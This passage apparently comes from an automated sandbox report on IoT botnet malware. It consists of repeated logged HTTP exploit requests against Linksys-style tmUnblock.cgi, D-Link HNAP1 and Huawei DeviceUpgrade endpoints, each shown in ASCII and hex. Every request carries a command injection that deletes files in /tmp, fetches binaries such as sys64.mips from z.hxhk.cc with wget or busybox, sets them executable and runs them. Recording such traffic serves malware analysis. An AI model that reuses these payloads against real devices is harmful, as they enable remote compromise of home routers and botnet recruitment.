2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 